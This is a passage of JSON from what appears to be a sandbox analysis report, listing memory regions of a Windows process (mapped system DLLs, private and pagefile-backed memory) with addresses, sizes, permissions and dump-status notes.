null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4787", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:36.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4788", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:36.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4789", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:36.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4790", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:36.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4791", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:36.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4792", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:36.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4793", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:36.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4794", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:36.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_4795", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:01:36.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4796", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:36.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4797", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:36.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4798", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:36.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4799", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:36.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4800", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:36.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4801", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:36.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4802", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:36.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4803", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:36.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 8126463, "entry_point": 0, "filename": null, "id": "region_4804", "name": "private_0x00000000006c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7077888, "timestamp": "00:01:36.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 9699328, "type": "region", "version": 1 }, "end_va": 9764863, "entry_point": 0, "filename": null, "id": "region_4805", "name": "private_0x0000000000940000", "norm_filename": null, "region_type": "private_memory", "start_va": 9699328, "timestamp": "00:01:36.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787932671, "entry_point": 1786975182, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4806", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:36.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4807", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:36.265", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4808", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:36.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4809", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:36.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959063551, "entry_point": 1959006881, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4810", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:36.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959104511, "entry_point": 1959073190, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4811", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:36.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959202815, "entry_point": 1959138048, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4812", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:01:36.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959264256, "type": "region", "version": 1 }, "end_va": 1959317503, "entry_point": 1959268832, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4813", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959264256, "timestamp": "00:01:36.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959546879, "entry_point": 1959334869, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4814", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:36.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4815", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:36.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4816", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:36.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4817", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:36.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4818", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:36.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4819", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:36.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4820", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:36.271", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4821", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:36.271", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4822", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:36.272", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4823", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:36.272", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4824", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:36.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4825", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:36.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4826", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:36.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4827", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:36.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4828", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:36.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4829", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:36.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4830", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:36.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4831", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:36.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4832", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:36.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4833", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:36.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4834", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:36.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 11370495, "entry_point": 0, "filename": null, "id": "region_4835", "name": "pagefile_0x0000000000950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9764864, "timestamp": "00:01:36.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4836", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:36.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4837", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:36.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4838", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_4839", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4840", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_4841", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_4842", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_4843", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_4844", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 2293760, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4845", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 2293760, "timestamp": "00:01:36.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_4846", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:01:36.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, 